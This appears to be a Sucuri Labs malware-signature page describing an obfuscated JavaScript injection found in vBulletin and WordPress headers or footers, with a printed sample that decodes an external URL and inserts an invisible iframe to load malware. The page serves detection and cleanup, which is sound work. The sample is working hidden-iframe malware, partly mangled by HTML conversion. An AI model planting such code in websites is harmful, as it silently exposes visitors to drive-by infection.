malware-entry-mwiframehd13

Description:

Javascript encoded code used to hide an iframe from http://img692.imagehacks.ws And a few different domains. This is used to load malware from external web sites while not being visible to the user.

Affecting:

VBulletin and WordPress sites.

Clean up:

This malware is generally hidden inside the template footer or header.

Malware dump (sample of malware):

<script type='text/javascript'>function rX(){};var eI='';rX.prototype = {gB : function() {var q=false;this.zO=false;n=false;return 'h!tztzp!:%/z/3i!mPg%6z9!2!.!i3m3a!gPePh!aPczk3s3.%w!sP/%i%m!gz6z9%2P/!4z638!1%/3hze!azd%e3rP.3j!pPezgP'.wX(/[P%3!z]/g, '');var p=30441;var rP="rP";},b : function() {lD=false;function c(){}; rY="";var tE="";var u=5874; var r='replace';this.wL='';var vQ=function(){return 'vQ'};var o=document;iI="";this.uF='';this.tU="tU";var a=window;var tI="tI";this.lB="";var bE=new Date();this.wJ='';this.aR="aR";var oB=false;String.prototype.wX=function(f,l){return this[r](f, l)};function eJ(){};aZ=false;this.bF="bF";var sM=false;var bT=function(){return 'bT'};gA="";var g = 'sHeHtHTPi8m+eHoPuPtP'.wX(/[P+8.H]/g, '');var aC=41736;var tX=function(){};k="k";var s = 'ThSt5m5l5 5>5qhqeqa5dq q>qT/5hpeTaqdp>STbpo5dTyS T>qS/SbToTdTyp>pq/phqtpm5lq>q'.wX(/[qpS5T]/g, '');this.zR='';this.tR="tR";this.vJ=43414;function lS(){};hH=29056;pZ="";try {this.nY='';function hHC(){};rQ=15540;var x=14181;var vC="";var m="";var lC=new Date();nI="";var i = 'b&o&dKyh'.wX(/[hYUK&]/g, '');var eM="";j='';this.eX=false;var zZ="zZ";var t = 's/tPyml9e$'.wX(/[$9/Pm]/g, '');this.gP="gP";zRX='';var vCQ='';var v = 'i4fDrZaZmDej'.wX(/[j7DZ4]/g, '');var tY="";var xD=function(){return 'xD'};var e = 'wSrvi$t$eE'.wX(/[E$vSc]/g, '');var mS=new Array();var eS="eS";var xL=19968;var h = 'c%r%e%aqtqeiEil%e#mdeinqt#'.wX(/[#dqi%]/g, '');zOQ="";var eZ=false;var iP = 'sLrFcE'.wX(/[EF%Lh]/g, '');var y=new Array();var aRO="aRO";this.nW="";hZ='';var mV=function(){};this.yO=false;var d = 's_e0tZAZt[t[r[i[b<em>u0t[e'.wX(/[�</em>[Z]/g, '');var kR=14265;this.dTH="";var dT = 'haid_d_e9na'.wX(/[a_M9]/g, '');uR=false;this.jM=false;this.fY=false;mH="mH";var gO = 'vfi+sfiUb9i9lfi9tUy+'.wX(/[+U}9f]/g, '');this.fD="";tYF=false;qZ=""; var aY = 'aspLp&e8n&d.C8h.i8l8dL'.wX(/[L.s&8]/g, '');this.qE="qE";kA='';function cO(){}; this.pH=64964;gK="";rN=''; var z=this.gB();eE=false;var dB='';var kL=new Date();var fP='';this.zE="";this.vS="";var iK=document<a href="v">h</a>;var dBM="dBM";var dO="dO";iK[t][gO] = dT;this.fPL="fPL";this.zEA='';this.bH="";iK[d](iP, z);dL="dL";var bG='';qS=false;var cI=function(){};var gOF=false;var jR=function(){return 'jR'};var gF=function(){};o[i]<a href="iK">aY</a>;this.tA='';var qG=50011;qA='';var qSE=false;this.zL='';var hR=new Date();} catch(eN) {function fX(){};function uU(){};yC=54763;var lU="lU";var jF=false;this.vZ=false;o.write(s);var gU=function(){};this.uFE="uFE";this.sG="";nF=false;this.mX="";var vSZ=false;var yOK="";var w = this;this.uS=false;tXB="tXB";function eO(){};this.hZN=60939;this.uL=21434;var mXW=new Date();lE=false;function dM(){};a[g](function(){ kT="kT";var aK=false;this.gV=30886;function jL(){};var hM=new Array();var yE="";kU=59489;this.vH=22572;w.b();var wC="";this.fXO=false;this.gL="gL";var qX=function(){};this.gFM=45515;var cE="";fE=false;var kH=new Array();}, 243);this.rNC='';function uW(){};var oD=new Array();}var kG='';bFO="";vE=false;}};this.xLA="xLA";var cX=new rX(); this.oA='';cX.b();this.lO=''; </code></pre></p> </div><!-- .entry-content --> <footer class="entry-footer wedocs-entry-footer"> <div class="wedocs-article-author" itemprop="author" itemscope itemtype="https://schema.org/Person"> <meta itemprop="name" content="Rodrigo Escobar" /> <meta itemprop="url" content="https://labs.sucuri.net/author/rodrigo-escobar/" /> </div> <meta itemprop="datePublished" content="2019-05-16T00:00:00+00:00"/> <time itemprop="dateModified" datetime=""></time> </footer> <nav class="wedocs-doc-nav wedocs-hide-print"><h3 class="assistive-text screen-reader-text">Doc navigation</h3><span class="nav-prev"><a href="https://labs.sucuri.net/signatures/sitecheck/malware-entry-mwiframehd14/">← malware-entry-mwiframehd14</a></span><span class="nav-next"><a href="https://labs.sucuri.net/signatures/sitecheck/malware-entry-mwiframegcounter/">malware-entry-mwiframegcounter →</a></span></nav> </article><!-- #post-## --> </div><!-- .wedocs-single-content --> </div><!-- .wedocs-single-wrap --> </main><!-- .site-main --></div><!-- .content-area --> </div><!-- #content --> <footer id="n-footer"> <div id="mp-footer" class="container"> <div class="row"> <div class="c-lg-12"> <div class="row"> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-products"> <div class="footer-heading"> <p>Products</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-prod-wf auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/website-firewall/">Website Firewall</a></li> <li class="list-block-item"><a class="mp-ft-prod-av auto-track" data-gatrack="Button_Click, Footer_Website_Antivirus" href="https://sucuri.net/website-security-platform/">Website Security Platform</a></li> <li class="list-block-item"><a class="mp-ft-prod-bp auto-track" data-gatrack="Button_Click, Footer_Website_Backups" href="https://sucuri.net/website-backups/">Website Backups</a></li> <li class="list-block-item"><a class="mp-ft-prod-wps auto-track" data-gatrack="Button_Click, Footer_WordPress_Security" href="https://sucuri.net/wordpress-security/">WordPress Security</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track" data-gatrack="Button_Click, Footer_Enterprise_Services" href="https://sucuri.net/custom/enterprise/">Enterprise Services</a></li> <li class="list-block-item"><a class="mp-ft-prod-ent auto-track d-none" data-gatrack="Button_Click, Top_Nav_Referrals" href="https://sucuri.net/referral/">Referral Program</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-solutions"> <div class="footer-heading"> <p>Solutions</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sol-ddos auto-track" data-gatrack="Button_Click, Footer_DDoS_Protection" href="https://sucuri.net/ddos-protection/">DDoS Protection</a></li> <li class="list-block-item"><a class="mp-ft-sol-scan auto-track" data-gatrack="Button_Click, Footer_Malware_Detection" href="https://sucuri.net/malware-detection-scanning/">Malware Detection</a></li> <li class="list-block-item"><a class="mp-ft-sol-removal auto-track" data-gatrack="Button_Click, Footer_Malware_Removal" href="https://sucuri.net/website-malware-removal/">Malware Removal</a></li> <li class="list-block-item"><a class="mp-ft-sol-prevent auto-track" data-gatrack="Button_Click, Footer_Malware_Prevention" href="https://sucuri.net/website-hack-protection/">Malware Prevention</a></li> <li class="list-block-item"><a class="mp-ft-sol-blacklist auto-track" data-gatrack="Button_Click, Footer_Blacklist-Removal" href="https://sucuri.net/website-security-platform/blocklist-removal-and-repair/">Blacklist Removal</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Support</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-sup-kb auto-track" data-gatrack="Button_Click, Footer_Knowledge_Base" href="https://docs.sucuri.net/">Knowledge Base</a></li> <li class="list-block-item"><a class="mp-ft-sup-sc auto-track" data-gatrack="Button_Click, Footer_Sitecheck" href="https://sitecheck.sucuri.net/">SiteCheck</a></li> <li class="list-block-item"><a class="mp-ft-sup-lab auto-track" data-gatrack="Button_Click, Footer_Research_Labs" href="https://labs.sucuri.net/">Research Labs</a></li> <li class="list-block-item"><a class="mp-ft-sup-rep auto-track" data-gatrack="Button_Click, Footer_Report_Abuse" href="https://abuse.sucuri.net/">Report Abuse</a></li> <li class="list-block-item"><a class="mp-ft-sup-stat auto-track" data-gatrack="Button_Click, Footer_Report_Status" href="https://status.sucuri.net/">Status Report</a></li> </ul> </div> </div> </div> <div class="c-lg-3 c-md-3 px-50"> <div class="footer-support"> <div class="footer-heading"> <p>Company</p> </div> <div class="footer-menu"> <ul class="list-block list-unstyled"> <li class="list-block-item"><a class="mp-ft-comp-about auto-track" data-gatrack="Button_Click, Footer_About" href="https://sucuri.net/company/">About Sucuri</a></li> <li class="list-block-item"><a class="mp-ft-comp-contact auto-track" data-gatrack="Button_Click, Footer_Website_Firewall" href="https://sucuri.net/company/contact-us/">Contact</a></li> <li class="list-block-item"><a class="mp-ft-sup-blog auto-track" data-gatrack="Button_Click, Footer_Blog" href="https://blog.sucuri.net/">Blog</a></li> <li class="list-block-item"><a class="mp-ft-comp-employment auto-track" data-gatrack="Button_Click, Footer_Employment" href="https://sucuri.net/referral/">Referral</a></li> <li class="list-block-item"><a class="mp-ft-comp-testimonials auto-track" data-gatrack="Button_Click, Footer_Testimonials" href="https://sucuri.net/customers/">Testimonials</a></li> </ul> </div> </div> </div> </div> </div> <div class="c-lg-12 footer-b"> <hr> <div class="d-flex"> <div class="sucuri-logo-wrapper sucuri-logo"> <a href="/" title="Sucuri Security" class="mp-sucuri-logo auto-track mt-0"></a> </div> <div class="row flex-column m-0"> <div class="pl-50"> <ul class="list-inline unstyled-list mb-0"> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-terms auto-track" data-gatrack="Button_Click, Footer_Terms_Of_Use" href="https://sucuri.net/terms/">Terms of Use</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-priv auto-track" data-gatrack="Button_Click, Footer_Privacy_Policy" href="https://sucuri.net/privacy/">Privacy Policy</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-cook auto-track" data-gatrack="Button_Click, Footer_Cookie_Policy" href="https://sucuri.net/cookies/">Do Not Sell My Personal Information</a></li> <li class="list-inline-item mr-5"><a class="mp-ft-copyright-faq auto-track" data-gatrack="Button_Click, Footer_FAQ" href="https://sucuri.net/faq/">Frequently Asked Questions</a></li> </ul> </div> <div class="copyright pl-50"> <p>© 2024 GoDaddy Mediatemple, Inc., d/b/a Sucuri. All rights reserved.</p> </div> </div> </div> </div> </div> <!-- /.container --> </div> </footer> </div><!-- #page --> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/plugins/wedocs/assets/js/anchor.min.js?ver=1.6.2' id='wedocs-anchorjs-js'></script> <script type='text/javascript' id='wedocs-scripts-js-extra'> /* <![CDATA[ */ var weDocs_Vars = {"ajaxurl":"https:\/\/labs.sucuri.net\/wp-admin\/admin-ajax.php","nonce":"dade8bf2ca","style":"https:\/\/labs.sucuri.net\/wp-content\/plugins\/wedocs\/assets\/css\/print.css","powered":"\u00a9 Sucuri Labs, 2024. Powered by weDocs<br>https:\/\/labs.sucuri.net"}; /* ]]> */ </script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/plugins/wedocs/assets/js/frontend.js?ver=1701723111' id='wedocs-scripts-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/navigation.js?ver=20151215' id='sucurikb-navigation-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/skip-link-focus-fix.js?ver=20151215' id='sucurikb-skip-link-focus-fix-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/foundation.min.js?ver=0.1' id='foundation-js-js'></script> <script type='text/javascript' src='https://labs.sucuri.net/wp-content/themes/sucurikb/js/custom.js?ver=0.1' id='sucuri-wp-custom-js-js'></script> <script id="module-flowchart"> (function($) { $(function() { if (typeof $.fn.flowChart !== "undefined") { if ($(".language-flow").length > 0) { $(".language-flow").parent("pre").attr("style", "text-align: center; background: none;"); $(".language-flow").addClass("flowchart").removeClass("language-flow"); $(".flowchart").flowChart(); } } }); })(jQuery); </script> <script id="module-prism-line-number"> (function($) { $(function() { $("code").each(function() { var parent_div = $(this).parent("pre"); var pre_css = $(this).attr("class"); if (typeof pre_css !== "undefined" && -1 !== pre_css.indexOf("language-")) { parent_div.addClass("line-numbers"); } }); }); })(jQuery); </script> </body> </html>